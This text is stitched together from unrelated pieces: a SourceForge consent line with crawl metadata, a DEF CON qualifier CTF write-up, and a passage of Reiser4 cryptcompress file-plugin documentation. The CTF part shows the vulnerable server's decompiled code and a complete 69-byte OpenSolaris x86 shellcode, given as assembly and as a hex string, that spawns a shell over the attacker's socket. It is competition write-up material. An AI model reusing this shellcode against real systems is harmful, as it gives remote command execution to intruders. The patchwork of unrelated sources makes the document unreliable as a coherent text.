I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details | https://sourceforge.net/p/wxhaskell/mailman/wxhaskell-users/?viewmonth=200602&viewday=4 | CC-MAIN-2017-22 | refinedweb | 698 | 68.67 |
New Release candidate v1.20.0.rc9
Hello everyone, There is a new Firmware release candidate v1.20.0.rc9 released today the new release includes the following:
Improvements:
- Releasing GIL when ssl handshake is performed.
- Allow PDN list update when carrier is defined in LTE
- Add support for LTE modem responses greater than UART buff size
- Added Check for LTE band support against both SW and HW versions of the LTE modem.
- Updated Sqns upgrade scripts to v1.2.5
Bug Fixes:
- Enabling Access to 2nd SPI perf for GPY modules
- Use Hardware timers for Lora timer tick to fix RTOS timer drifts when cache is disabled.
- Updated OTA fixing failing OTAs after switching to Factory Partition.
- Fix crash when pin ISR handler fires (i.e. LoRa TX done) during flash operation PR #278 by Martijn Thé @martijnthe
- Remove defaulting of wifi max_tx_pwr to level 20 in init()
- modlora: Reverted the rx spread factor in stats
You can download the source code here
or you can flash it directly via the Firmware Updater tool as the latest development firmware.
Also new Sequans Firmwares for CAT-M1 [41065] and NB-IoT [41019] are available for download see this post
NOTE: To upgrade to the New Sequans Firmwares 41065 and 41019 you should use the latest this latest Development release or the latest Stable release v1.18.2.r4
@tlanier
Found the answer to my question. If I select the stable version in the Firmware Upgrade Tool and then select the Type/Version to development, I get the option to select 1.20.0.rc9.
Where can I get the GPy-1.20.0.rc9.tar.gz file? The file is not found on the downloads web page Downloads GPy.
We have done extensive testing of our product with this version and have shipped production units. Now we have purchased new GPy's and when I try to use the Firmware Update Tool version 1.15.2.b1 with development releases checked, the 1.20.0.rc9 option is not available.
Any help would be appreciated. We will update and test our program to work with newer releases later, but for now we need to use the well tested version. I know it was a beta version, but for our purposes it worked well. The production version at the time had issues which the beta version solved.
The iccid() function only works after an attach command is attempted. Since we use the ICCID to determine the correct APN to use in the attach command, we have to do a dummy attach call, read the iccid, detach, and then correctly attach with the computed apn. Hope this helps others until this issue is resolved.
Below is the revised code that now works.
from network import LTE lte = LTE() lte.reset() lte.init() sleep_ms(1500) iccid = lte.iccid() # does not work lte.attach(apn='unknown') # attempt attach so iccid() will work sleep_ms(1500) iccid = lte.iccid() # iccid() now works lte.detach(reset=False) # compute apn from iccid lte.attach(apn=computed_apn) # attach with correct apn | https://forum.pycom.io/topic/4631/new-release-candidate-v1-20-0-rc9 | CC-MAIN-2019-51 | refinedweb | 512 | 65.62 |
TA: Loc Do
Due Sunday, Sep 09, 2012 @ 23:59:59
Goals
This assignment is designed to give you some practice with C
Submission
Create a directory named “hw2” inside your working repository and put your solutions to problems 1 and 2 in
hw2.txt, and problem 3 in
bitcount.c.
It is important that you place your submission for hw2 inside this directory and not somewhere else, as when we pull submissions, we will look for your submission there. Then run these commands:
git add −A git commit −m “hw2 submission” git tag −f hw2 git push --tags origin master
Problem 1
P&H (Revised 4th) exercise 2.33.2 for option b: Convert this function into pointer-based code.
void shift(int a[], int n) { int i; for(i = 0; i != n-1; i++) a[i] = a[i+1]; }
Problem 2
a) Complete the following
setName, getStudentID, and setStudentID functions. You may assume the pointers given are valid and not null.
#include <stdio.h> #include <stdlib.h> #define MAX_NAME_LEN 127 typedef struct { char name[MAX_NAME_LEN + 1]; unsigned long sid; } Student; /* return the name of student s */ const char* getName (const Student* s) { return s->name; } /* set the name of student s If name is too long, cut off characters after the maximum number of characters allowed. */ void setName(Student* s, const char* name) { /* fill me in */ } /* return the SID of student s */ unsigned long getStudentID(const Student* s) { /* fill me in */ } /* set the SID of student s */ void setStudentID(Student* s, unsigned long sid) { /* fill me in */ }
b) What is the logical error in the following function?
Student* makeAndrew(void) { Student s; setName(&s, "Andrew"); setStudentID(&s, 12345678); return &s; }
Problem 3
a) Write a function bitCount() in bitcount.c that returns the number of 1-bits in the binary representation of its unsigned integer argument. To compile bitcount.c and create an executable named bitcount:
gcc -std=c99 -o bitcount bitcount.c
Remember to fill in the identification information and run the completed program to verify correctness.
/* Name: Lab section time: */ #include <stdio.h> int bitCount(unsigned int n); int main(void) { printf ("# 1-bits in base 2 representation of %u = %d, should be 0\n", 0, bitCount (0)); printf ("# 1-bits in base 2 representation of %u = %d, should be 1\n", 1, bitCount (1)); printf ("# 1-bits in base 2 representation of %u = %d, should be 17\n", 2863377066u, bitCount(2863377066u)); printf ("# 1-bits in base 2 representation of %u = %d, should be 1\n", 268435456, bitCount(268435456)); printf ("# 1-bits in base 2 representation of %u = %d, should be 31\n", 4294705151u, bitCount(4294705151u)); return 0; } int bitCount(unsigned int n) { /* your code here */ }
b) You have decided that you want your bitcount program above to work from the command-line (see K&R Section 5.10), as follows:
# ./bitcount 17 2 # ./bitcount 255 8 # ./bitcount 10 20 too many arguments! # ./bitcount [the same result as from part a]
Edit your bitcount.c to include this functionality. You may assume that the single argument will always be an integer in the range from 0 to 231-1. You will find the function
atoi helpful.
Extra for experts: Implement this exercise without using the library function
atoi (or something comparable). (You don't actually get extra points for this). | http://www-inst.eecs.berkeley.edu/~cs61c/fa12/hws/hw2/hw2.html | CC-MAIN-2016-50 | refinedweb | 554 | 61.77 |
Neuroph: Smart Java Apps with Neural Networks (Part 3)
Neuroph: Smart Java Apps with Neural Networks (Part 3)
Neural networks can learn to map input onto output data.
Join the DZone community and get the full member experience.Join For Free
Neural networks can learn to map input onto output data, and are used for tasks like image recognition, automated classification, prediction, and artificially intelligent game characters. In part 3 of this series, the NetBeans team interviewed Zoran Sevarac from Neuroph about adding an image recognition task to a Java application. Part one of the interview discusses what neural networks are and why the NetBeans IDE was the natural choice for the Neuroph development team. In part two of the interview we had a closer look at use cases of neural networks—and what they can do for you!
Neural Networks - the Why and the How
Why use neural networks for image recognition?
Although there are other techniques for image recognition, neural networks are an interesting solution due to the following properties:
- They can learn to recognizeor classify images.
- They are able to generalize, which means that they can recognize images they've never 'seen' before, and which are similar to the images they already know.
- They are noise resistant, which means that they can recognize damaged or noisy images.
I don't know anything about neural networks, can I use image recognition?
Yes, you can use image recognition, even if you don't know anything about neural networks. We've tried to keep all of the neural network-related stuff under the hood, and just provide the image recognition interface. Basic knowledge about neural networks is helpful for training neural networks, but you'll get the idea how this works while experimenting.
How do I use neural networks for image recognition?
First you transform the training images into a form which can input into neural networks: The Neuroph library provides the FractionRgbData class which transforms a BufferedImage into normalized RGB vectors. Next you train the neural network to learn these image vectors. The type of neural network we use is the Multi-Layer Perceptron with a Back Propagation learning rule.
Picture 1. Feeding image vectors into a neural network
Neural Networks - Use Cases
Can I use Neuroph for face recognition?
Our image recognition approach can learn to distinguish between a fixed set of faces, but it is not an appropriate solution for more advanced face recognition. It won't recognize any variations like different angles, shades, different hairstyle, etc.
Can I use Neuroph to recognize online images or captchas?
Yes, online images can be recognized using a method which accepts image URLs as input arguments. Captchas are not as easy: The main issues are to identify letters and digits, and to remove background noise and distortion. This means before feeding the data into the neural network, some image preprocessing is necessary. This could be an interesting experiment to try.
Can Neuroph be used to search images or recognize parts of an image?
Neuroph's image recognition approach is not intended for this task, probably there are other, more efficient techniques. Brute-force scanning whole image for specific image parts of a given size can be done, if you know exactly what are you searching for and you know where to look.
Neuroph - Features and Requirements
What image formats are supported?
Supported image formats are BMP, JPG, PNG and GIF.
What is the maximum image size?
Theoretically, the maximum is not constrained, but in practice it depends on available memory and time. Training on large images requires more complex neural networks with more neurons and layers; the training requires more time, and it can be tricky to tweak the network and training parameters. If you have issues with a creating network of a certain size, try to increase the maximum heap size.
How fast is Neuroph?
For smaller images the training process only takes a few minutes. For large images and large numbers of images, training can take a few hours. But once we have trained the network, the recognition itself is pretty fast.
Is there a difference between recognizing black/white and color images?
It's the same principle, the only difference is, for black/white images you need smaller networks with less neurons, and the training is faster. Recognizing images in full RGB color requires three times more input neurons than recognizing black/white images.
Neuroph - Usage
How do I use the Neuroph library for image recognition?
There are three steps:
- Prepare the training images that you want to recognize.
- Create, train, and save the image recognition network using the GUI tool from the easyNeurons application.
- Deploy the saved neural network to your application by using our Neuroph Neural Network Java library, neuroph.jar.
What software do I need to use Neuroph Image Recognition?
To use Neuroph Image Recognition you need:
- Java JDK 1.6
- The Neuroph Framework 2.3.1 (download)
- Including the easyNeurons GUI application for training image recognition networks, and
- the Java Neural Network library for deploying trained neural networks to your application.
How do I add an image recognition task to my Java application?
This sample code shows you how to make use of a trained image recognition neural network in your application. A step-by-step tutorial how to train image recognition neural network is available here.
import org.neuroph.core.NeuralNetwork;import org.neuroph.contrib.imgrec.ImageRecognitionPlugin;import java.util.HashMap;import java.io.File;import java.io.IOException;public class ImageRecognitionSample { public static void main(String[] args) { // load trained neural network saved with easyNeurons // (specify existing neural network file here) NeuralNetwork nnet = NeuralNetwork.load("MyImageRecognition.nnet"); // get the image recognition plugin from neural network // (image recognition interface for neural network) ImageRecognitionPlugin imageRecognition = (ImageRecognitionPlugin)nnet.getPlugin (ImageRecognitionPlugin.IMG_REC_PLUGIN_NAME); try { // image recognition is done here (specify some existing image file) HashMap output = imageRecognition.recognizeImage(new File("someImage.jpg")); System.out.println(output.toString()); } catch(IOException ioe) { ioe.printStackTrace(); } }}
As you can see, the following steps are needed to use a neural network in your application:
- Load a trained neural network.
- Get the image recognition plugin from the neural network.
- Call the recognizeImage() method on an image.
- Evaluate the resulting HashMap output.
The actual recognition step is just one method call. It returns a HashMap with image labels as keys, and their degree of recognition as values. The higher the degree of recognition, the more likely it is the image that you trained it to recognize. The method recognizeImage() can take a File, URL, or BufferedImage as input.
Other important classes from the neuroph.jar library are:
FractionRgbData – takes a BufferedImage as input and creates RGB data used by neural networks.
ImageRecognitionPlugin – provides the image recognition interface for the neural network, so the user doesn't even have to know that there is a neural network behind the scenes.
ImageSampler – provides methods to dump image samples from the screen (very exciting!) and scale images.
Can you share any recommended best practices?
- Scale all images used for training to the same dimensions.
- If color is not important for your task, use black/white, it will train faster.
- Use the same image dimensions for training and recognition.
- If you get out-of-memory exceptions for bigger images, increase the JVM heap size using -Xms and -Xmx options.
- Use the fastest CPU you can get, since training neural network can take a while.
How can I best use Neuroph with an IDE?
The members of our NetBeans User Group are working on a Neuroph plugin for the NetBeans IDE. We plan to make specialized components for image recognition, OCR, classification, prediction, and approximation, available from the NetBeans Palette.
To make this possible, we need to provide a way for users to customize the underlying neural network, to train the neural network with their data. Presently this is done with the easyNeurons GUI, but we plan to provide the easyNeurons training UI directly inside the NetBeans IDE. We will need a new project type for neural networks, training sets, and test sets. It would also be nice to develop a wizard which will guide inexperienced users.
When we put all this together, we see that we're talking about porting the existing easyNeurons application to the NetBeans platform. We are aware that this will require a lot of work! Presently we don't have enough experience with the NetBeans Platform, and there's only a small number of active developers in our team. We have only just started our local NetBeans User Group (six developers with Neuroph experience), but our members will attend the NetBeans Platform Training, so we believe this can be accomplished!
Neuroph – Next Steps
We see that Neuroph is in active development. What are your future plans?
We plan to release the NEAT algorithm support developed by Aidan Morgan as part of the Neuroph framework. NEAT (NeuroEvolution of Augmenting Topologies) uses a genetic algorithm to evolve the neural network topology (the number of layers and neurons) along with weights. This approach can save time that is usually spent deciding on a network topology for a particular problem.
We also plan to provide a specialized time series prediction API.
Additionally we are working on an OCR (Optical Character Recognition) library based on the existing image recognition. We hope to provide an out-of-the-box OCR component and tools. We have just released our first demo applications for OCR and NEAT support, one for hand-written letter recognition, and one for text recognition from an image. Try them now!
Thank you for the interview, Zoran! Learn more at the Neuroph project home.
Opinions expressed by DZone contributors are their own.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }} | https://dzone.com/articles/neuroph-smart-java-apps-neural-1?fromrel=true | CC-MAIN-2019-51 | refinedweb | 1,626 | 55.74 |
UpScaleDB: Using an Embedded Database
Abstract
Using an embedded database in your software requires a bit of work. I show you how to do it in this article.
WEBINAR: On-demand webcast
How to Boost Database Development Productivity on Linux, Docker, and Kubernetes with Microsoft SQL Server 2017 REGISTER >
Disclaimer: Christoph is the author of upscaledb, which is an open source project with commercial licenses. He has written this article so the information can be used with other key-value databases as well.
Introduction
Chances are, if you are a developer then you have already written your own embedded database: a set of functions which store, load and search indexed data. For persisting the data, you might have used your own file format, or resorted to standards like json or xml. Then a few questions usually come up: will those functions scale if the data size grows? What will happen if the disk is full while the file is written? And how to implement a secondary index, or even transactions?
When do you need an embedded database?
Embedded databases obviously are not related to embedded platforms, although they also can run on phones, tablets or a Raspberry Pi. “Embedded” means they are directly linked into your application. If users install your program then there is no need to install (and administrate) a separate database. Your installation routines will be a lot simpler, you do not have to provide support for the various database problems and your users have less hassle. Your code will usually run faster, too, because you avoid the inter-process communication between your application and the external database.
But there’s no such thing as free lunch, and embedded databases have their disadvantage, too: their functionality is limited compared to a full-blown SQL database. Most of them do not even support SQL at all - after all, they’re just a bunch of functions that are linked into your application.
In order to use an embedded database, you will therefore write your own SQL-like layer. Writing your own database is fun and rewarding, and if you follow this article then you will also see that it’s not as difficult as it sounds!
What is upscaledb?
upscaledb is an open source embedded key/value store. A key/value store is like a persistent associative container: a set of values, each value is indexed by a key. Upscaledb is a C library which can be used with .NET, Java (and other JVM languages), Python and Erlang/Elixir. It has functionality which makes it unique in the niche of key/value stores: it treats keys and values not just as byte arrays, but understands the concept of "types". A database can have keys (or a values) of a specific type, i.e. UINT16, UINT32, fixed length binary strings or variable length binary strings and a few others. This type information is used by upscaledb to reduce storage and increase performance. I.e. a UINT32 key is stored in exactly four bytes, and does not require any overhead. Storing a UINT32 key as a variable-length binary would require additional overhead (for the size and maybe a byte for additional flags). Even more important, UINT32 keys can be processed with modern SIMD instructions. Binary keys cannot, because of said overhead.
Installing upscaledb
Download the newest files from. For Windows you will find precompiled binaries. After unpacking them, make sure to add the installation directories to your IDE settings, otherwise the header files and the libraries cannot be found.
For linux, a typical “./configure”, “make”, “make install” is sufficient. Apple users will prefer the homebrew recipe (“brew install upscaledb”).
A gentle introduction to the basic concepts: Environments, Databases
Let’s see upscaledb in action. First we need to create an “Environment”, which basically is a container for databases. An environment can be in-memory, or backed by a file. And it supports a wide range of parameters, i.e. the cache size, but also whether transactions should be supported.
An environment can store multiple databases (a few hundreds, actually), and they are identified by a “name”. This name is actually a 16bit number, and some values (i.e. 0 and everything > 0xf000) are reserved. Our example code below uses the number 1 (stored in the enum “kDbId”).
The following C++ code creates an Environment with another database for storing time-series data. The timestamps are stored as 64bit numbers, and the data has a fixed length of 64 bytes.
int main() { ups_status_t st; ups_env_t *env; // upscaledb environment object ups_db_t *db; // upscaledb database object // First create a new Environment (filename is "timeseries.db") st = ups_env_create(&env, "timeseries.db", 0, 0, 0); if (st != UPS_SUCCESS) handle_error("ups_env_create", st); // parameters for the new database: 64bit numeric keys, fixed length records ups_parameter_t db_params[] = { {UPS_PARAM_KEY_TYPE, UPS_TYPE_UINT64}, {UPS_PARAM_RECORD_SIZE, sizeof(TsValue)}, {0, } }; // Then create a new Database in this Environment st = ups_env_create_db(env, &db, kDbId, 0, &db_params[0]); if (st != UPS_SUCCESS) handle_error("ups_env_create_db", st); // We will perform our work here // ... // Close the Environment before the program terminates. The flag // UPS_AUTO_CLEANUP will automatically close all databases and related // objects for us. st = ups_env_close(env, UPS_AUTO_CLEANUP); if (st) handle_error("ups_env_close", st); return (0); }
Example: Storing incoming time-series data
With that framework in place, we can start filling the database. Our simulation pretends that there are 1 million incoming events. Timestamps are in nanosecond resolution, and therefore we automatically avoid duplicate keys. upscaledb supports duplicate keys (for 1:n relations), but avoiding them increases performance.
Be careful when you run the sample code, the generated database file grows to north of 100 GB!
static void add_time_series_event(ups_db_t *db) { // Store timestamps in nanonsecond resolution uint64_t now = nanoseconds(); // Our value is just a placeholder for our example. A real application // would obviously use real data here. TsValue value = {0}; ups_key_t key = ups_make_key(&now, sizeof(now)); ups_record_t rec = ups_make_record(&value, sizeof(value)); // Now insert the key/value pair ups_status_t st = ups_db_insert(db, 0, &key, &rec, 0); if (st != UPS_SUCCESS) handle_error("ups_db_insert", st); }
Example: Printing all events in a time range
All that data needs to be analyzed, and indeed analyzing large tables is one of the strengths of upscaledb. For the sake of a demonstration, we will create a window function which processes the data that was inserted in the last 0.1 seconds. Our code creates a “cursor” and locates it at a timestamp that is 0.1 seconds in the past. From then on it moves forward till it reaches the end of the database.
static void analyze_time_series(ups_db_t *db) { // Analyzing time series data usually means to read and process the // data from a certain time window. Our window will be the last 0.1 seconds // that were stored. Create a cursor and locate it on a // key at "now - 0.1 seconds". uint64_t start_time = nanoseconds() - (1000000000 / 10); ups_key_t key = ups_make_key(&start_time, sizeof(start_time)); ups_record_t rec = {0}; // Create a new database cursor ups_cursor_t *cursor; ups_status_t st = ups_cursor_create(&cursor, db, 0, 0); if (st != UPS_SUCCESS) handle_error("ups_cursor_create", st); // Locate a key/value pair with a timestamp about 0.1 sec ago st = ups_cursor_find(cursor, &key, &rec, UPS_FIND_GEQ_MATCH); if (st != UPS_SUCCESS) handle_error("ups_cursor_find", st); int count = 0; do { // Process the key/value pair; we just count them count++; // And move to the next key, till we reach "the end" of the database st = ups_cursor_move(cursor, &key, &rec, UPS_CURSOR_NEXT); if (st != UPS_SUCCESS && st != UPS_KEY_NOT_FOUND) handle_error("ups_cursor_move", st); } while (st == 0); // Clean up ups_cursor_close(cursor); std::cout << "In the last 0.1 seconds, " << count << " events were inserted" << std::endl; }
Running the sample
You can download the sources at. They require a C++11 compliant compiler and were tested with g++ 4.8.4 on Ubuntu 14.04 and with upscaledb version 2.1.12. Inserting 1 million events took less than half of a second, and using the cursor to analyze the last 0.1 seconds just took 55 milliseconds! An SQL server will have a hard time beating this. (I am running the test on a Core i5 with an SSD.)
Inserting 1 mio events: 474.882 ms In the last 0.1 seconds, 217945 events were inserted Analyzing 0.1 sec of data: 55.4289 ms
Conclusion
I hope you have seen that an embedded database is not difficult to use. Typically you require only few functions which read and write your C/C++ structures from and to the database, and a few other functions to implement your queries. But i have rarely seen applications where these functions are more than a few hundred lines of code. The benefits in performance and simplicity are huge, and we have not yet even started to optimize (i.e. by reducing the keys to 32bit, by compressing the keys or by increasing the database cache).
Nowadays computers are powerful enough that it’s possible to store data sizes of many million items in a single file. I have run (synthetic) benchmarks above 1 billion index operations on a single machine, bulk loading less than 3 minutes, analyzing all of them in about 1.5 seconds. Big data fits on today’s desktops!
There are no comments yet. Be the first to comment! | https://www.codeguru.com/cpp/data/mfc_database/upscaledb-using-an-embedded-database-160126083724.html | CC-MAIN-2017-47 | refinedweb | 1,527 | 56.76 |
Here forking server. For each incoming TCP connection, if the source port is in the 5000-6000 range, 73 bytes are read and then executed (except the first byte). The child thread just executed this:
int __cdecl client_callback(int fd) { void *v1; // esp@1 uint16_t v2; // ax@3 int v4; // [sp+0h] [bp-38h]@1 int execute_buf; // [sp+Ch] [bp-2Ch]@1 int *v6; // [sp+10h] [bp-28h]@1 int v7; // [sp+14h] [bp-24h]@6 void (*execute_the_buffer)(void); // [sp+18h] [bp-20h]@1 socklen_t len; // [sp+1Ch] [bp-1Ch]@1 struct sockaddr addr; // [sp+20h] [bp-18h]@1 v6 = &v4; v1 = alloca(16 * ((unsigned int)(BUFSIZE + 30) >> 4)); execute_buf = 16 * ((unsigned int)((char *)&execute_buf + 3) >> 4); execute_the_buffer = (void (*)(void))(16 * ((unsigned int)((char *)&execute_buf + 3) >> 4) + 1); len = 16; if ( getpeername(fd, &addr, &len) == -1 ) exit(-1); v2 = ntohs(*(uint16_t *)&addr.sa_data[0]); printf("port: %d \n\n\n", v2); if ( ntohs(*(uint16_t *)&addr.sa_data[0]) > 0x1387u && ntohs(*(uint16_t *)&addr.sa_data[0]) <= 0x1770u ) exit(-1); v7 = readAll(fd, execute_buf, BUFSIZE); printf("read %d bytes\n\n\n", v7); execute_the_buffer(); return 0; }
So, we needed to send a shellcode shorter than 72 bytes. Unfortunately, Metasploit was of little help here, so we had to scout the web looking for suitable candidates. After several cases of it-work-on-our-VM-but-not-at-DDtek, we decided to roll our own.
Here it is: it spawns a shell using the TCP connection file descriptor as stdin, stdout and stderr.
#include <stdio.h> #include <sys types.h> #include <unistd.h> #include <fcntl.h> void f(void); int main(int argc, char **argv) { f(); } void f(void) { __asm__( //padding "nop \n" //dup 0 into 5 "xor %edx, %edx \n" "xor %ebx, %ebx \n" "xor %edi, %edi \n" "xor %ecx, %ecx \n" "mov $9, %bl \n" "mov $62, %di \n" "mov $5, %cl \n" "push %edx \n" "push %ebx \n" "push %ecx \n" "push %edx \n" "mov %edi, %eax \n" "int $0x91 \n" //dup 1 into 5 "push $1 \n" "push %ebx \n" "push %ecx \n" "push %edx \n" "mov %edi, %eax \n" "int $0x91 \n" //dup 2 into 5 "push $2 \n" "push %ebx \n" "push %ecx \n" "push %edx \n" "mov %edi, %eax \n" "int $0x91 \n" // //close stdin // "push %edx \n" // "push %edx \n" // "incl %ecx \n" // "mov %ecx, %eax \n" // "int $0x91 \n" //shell "xorl %eax,%eax \n" "pushl %eax \n" "pushl $0x68732f6e \n" "pushl $0x69622f2f \n" "movl %esp,%ebx \n" "pushl %eax \n" "pushl %ebx \n" "movl %esp,%edx \n" "pushl %eax \n" "pushl %edx \n" "pushl %ebx \n" "movb $0x3b,%al \n" "pushl %eax \n" "int $0x91 \n" ); }
Total: 69 bytes (and 1 for padding).
Here’s the shellcode
\x90\x31\xd2\x31\xdb\x31\xff\x31\xc9\xb3\x09\x66\xbf\x3e\x00\xb1\x05\x52\x53\x51\x52\x89\xf8\xcd\x91\x6a\x01\x53\x51\x52\x89\xf8\xcd\x91\x6a\x02\x53\x51\x52\x89\xf8\xcd\x91\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x91
That’s it. For my future reference, here’s the mapping between the familiar Debian commands and the OpenSolaris ones that were useful in the competition.
- apt-cache search => pkg search
- apt-get install => pkg install
- strace => truss (strace didn’t appear to work)
Ciao! | http://www.lucainvernizzi.net/blog/2011/06/06/defcon-quals-19-pwtent-pwanble-200-writup/ | CC-MAIN-2017-30 | refinedweb | 566 | 61.7 |
"Brian Elmegaard" <be at et.dtu.dk> wrote in message news:3A40813B.C04D21C at et.dtu.dk... > I am not a computer scientist, just an engineer knowing how to program in > Fortran, Pascal,... So I after reading some of the python material on the web, I > decided to give it a try and is now using the language some, finding it fun and > easy. I'm a statistician who discovered the same thing about four years ago. > On usenet I have now learned from skilled scientists, By their own evaluation? Think instead 'CS theologians' or even 'religious fanatics'. > that Python has some deficiencies regarding scope rules, and I am not capable > of telling them why it has not (or that it has). Deficiency is in the eye of the beholder. This religious discussion has been going on for at least since I started listening; probably has since the beginning of Python; and will probably continue until Python dies. Consider not getting too involved. > In Aaron Watters 'The wwww of python' I have read that Python uses lexical > scoping with a convenient modularity. But, other people tell me it does not. > Some say it uses dynamic scoping, some say it uses it own special > 'local-global-builtin' scope. What is right? I have discovered that while good computer scientists may develop a definsible terminology that they use consistently each unto themselves, they do not always agree. This seems to one of those areas where language is not settled. > The above mainly is a theoretical question. A question like 'what is the optimal asymptotic efficiency of a sorting algorithm based on comparisions' has an answer: n log n. The scope discussion does not seem to. > A more practical example which I agree seems a bit odd is: > >>> x=24 > >>> def foo(): > ... y=2 > ... print x+y > ... > >>> def bar(): > ... x=11 > ... foo() > ... > >>> bar() > 26 When a function encounters a name that is not in its local scope, where should it look to find a value to substitute (given that there are no explicit pointers)? There are three general answers: nowhere (raise an exception or abort); somewhere in the definition environment; or somewhere in the usage environment. Python's current answer is in the namespace of the defining module (and then in the builtin namespace attached to that module). The only things I find 'odd' (and definitely confusing at first) is the use of 'global' for the module namespace (and I suppose there is some history here) and the sometimes claim that there are two rather than three possible scopes. For odd behaviour, consider the following possibility: plane_geometry.py: _dimension = 2 def SegSectTri2d(line_segment, triangle): "does line_segment intersect triangle in xy-plane" # uses _dimension and depends on it being 2 ... space_geometry.py import plane_geometry _dimension = 3 def SegSectTri3d(line_segment, triangle): "does line_segment intersect triangle in xyz-space" # uses _dimension and depends on it being 3 # uses plane_geometry.SegSectTri2d() for part of its calculation Now, I would be disappointed if the plane geometry functions did not work when called from space geometry functions because the two modules happened to use the same spelling for the private dimension constant. Terry J. Reedy | https://mail.python.org/pipermail/python-list/2000-December/048457.html | CC-MAIN-2019-51 | refinedweb | 526 | 54.42 |
I have an ASP.NET web site that houses some WCF services. I have hooked up to the Application_Error event, so can log any unhandled exceptions.
What I would really like to do is pass the execution back to the method that was called, so I can return something sensible to the client, rather than throwing a FaultException.
I know I can wrap each individual service call in a try/catch block, but that means a load of boilerplate code in every single method. What I would really like to do is have a central catch-all method, like Application_Error, but then allow the individual service call do take back control and return something meaningful to the client.
Is this possible?
P.S. In case anyone thinks I'm doing this the wrong way, the background to this is that I'm implementing Railway Oriented Programming in my C# WCF code. The idea is that if there is an exception, I return an appropriate object that contains the details, along with other useful stuff. This is a much more controlled way of dealing with the situation than having the WCF service throw an exception.
If you want to do something akin to the ROP-style, then you can do the following (Failable name from Jeff Bridgman's suggestion).
First create abstract base classes as follows...
public abstract class Failable<T> { } public abstract class Failable { }
Next create concrete classes from these to represent success and failure. I've added a generic and non-generic version of each, so you can handle service calls that return a value as well as void ones...
public class Success<T> : Failable<T> { public Success(T value) { Value = value; } public T Value { get; set; } } public class Success : Failable { } public class Failure<T> : Failable<T> { public Failure(Exception value) { Value = value; } public Exception Value { get; set; } } public class Failure : Failable { public Failure(Exception value) { Value = value; } public Exception Value { get; set; } }
Then a couple of helper methods will give you what you want...
public static Failable<T> DoFailableAction<T>(Func<T> f) { Failable<T> result; try { T fResult = f(); result = new Success<T>(fResult); } catch (Exception ex) { result = new Failure<T>(ex); } return result; } public static Failable DoFailableAction(Action f) { Failable result; try { f(); result = new Success(); } catch (Exception ex) { result = new Failure(ex); } return result; }
To use these, suppose you have your WCF service. You wrap the service call in the helper method...
Failable<Person> p = FailableHelpers.DoFailableAction(() => service.GetPerson(1));
Then, you can check if the call succeeded or failed, and act appropriately...
if (p is Success<Person>) { Person p = ((Success<Person>)p).Value; Debug.WriteLine("Value is Success, and the person is " + p.FirstName + " " + p.Surname); } else { Exception ex = ((Failure<Person>)p).Value; Debug.WriteLine("Value is Failure, and the message is " + ex.Message); }
If your service method is void, you just use the non-generic variation...
Person jim = new Person(1, "Jim", "Spriggs"); Failable saveResult = FailableHelpers.DoFailableAction(() => service.Update(jim));
You haven't quite achieved what you wanted, as you still have some boilerplate code in each service method, but it's very little. Not as little as an attribute on the method, but then this approach is much simpler to implement, and works for any kind of level, whether a repository, business logic, WCF service, client, etc. The attibute approach only works for WCF.
The benefit of this approach is that it puts the onus on the consumer of the WCF service (or whatever) to check if the service call was successful, and act appropriately. This is a functional style, and leads to much more robust coding, as you are pretty much forced not to ignore exceptions, unlike non-functional programming, where you would likely just grab the result of the service under the assumption that nothing went wrong. That's fine until something does go wrong!
Hope that helps. | https://codedump.io/share/PkLdJOIzpsV5/1/can-i-return-execution-to-the-failing-method-after-an-unhandled-exception | CC-MAIN-2017-34 | refinedweb | 648 | 52.7 |
Reiser4 file system: Transparent compression support.
Further development and compatibility.
A. Reiser4 cryptcompress file plugin(*) and its conversion(**)
This is the second file plugin that realizes regular files in reiser4.
Unlike previous one (unix-file plugin), cryptcompress plugin manages
files with encrypted and(or) compressed bodies packed to metadata
pages, so plain text is cached in data pages (pinned to inode's
mapping), which don't participate in IO: at background commit their
data get compressed with the following update of old compressed
bodies. This update is going in so-called "squalloc" phase of the
flush algorithm, so eventually everything will be tightly packed.
And yes, metadata pages are supposed to be writebacked. Roughly
speaking, cryptcompress file occupies more memory and smaller disk
space then ordinary file (managed by unix-file plugin). In contrast
with unix-file plugin, the smallest addressable unit is page cluster
(in memory) and item cluster (on disk). Also cryptcompress plugin
implements another, more economic approach in representing holes.
However it calls the same low-level (node, etc) plugins, so you can
have a "mixed" fileset on your reiser4 partition. See below about
backward compatibility.
To reduce cpu and memory usage when handling incompressible data one
should assign proper compression mode plugin. The default one
activates special hook in ->write() method of cryptcompress file
plugin (only once per file's life, when starting to write from special
offset in some iteration) which tries to estimate whether a file is
compressible by testing its first logical cluster (64K by default).
If evaluation result is negative, then fragments will be converted to
extents, and management will be passed to unix-file plugin. Back
conversion does not take place. If evaluation result is positive, then
file stays under cryptcompress plugin control, but compression will be
dynamically switched by flush manager in accordance with the policy
implemented by compression mode plugin. This heuristic looks mostly
like improvisation and might be improved via modifying the compression
mode plugin (***) (some statistical analysis is needed here to make
sure we don't worsen the situation).
So let's summarize what we have in the cases of not success in primary
evaluation performed by default mode:
1. file is incompressible, but its first logical cluster is
compressible. In this case compression will be "turned off" in
flush time, so we save only cpu, whereas memory consumption is
wasteful, as file stays under cryptcomptress plugin control. Also
deleting a huge file built of fragments is not the fastest
operation.
2. file is compressible, but its first logical cluster is
incompressible. In this case management will be passed to the
unix-file plugin forever (not the worse situation).
---
(*) "plugins" means "internal reiser4 modules". Perhaps, "plugin" is a
bad name, but let us use it in the context of reiser4 (at least for
now). Each plugin is labeled by a unique pair (type, id), so plugin's
name is composed of id name (first) and type name. For example,
"extent item plugin" means plugin of item type that manages extent
pointers in reiser4. Plugins of file type are to service VFS
entrypoints.
(**) plugin conversion means passing management to another plugin of
the same plugin type: (type, id1) -> (type, id2) with the following
(or preceded) conversion of controlled objects (tail conversion is a
classic example of such operation).
(***) when modifying an existing plugin we should be careful (see
below about backward compatibility).
B. Getting started with cryptcompress plugin
****************** Warning! Warning! Warning! ************************
This stuff is experimental.
Do not store important data in the files managed by cryptcompress
plugin. It can be lost with no chances to recover it back. Also
creating at least one such file on your product Reiser4 partition can
cause its unrecoverable crash. It is not a joke!
**********************************************************************
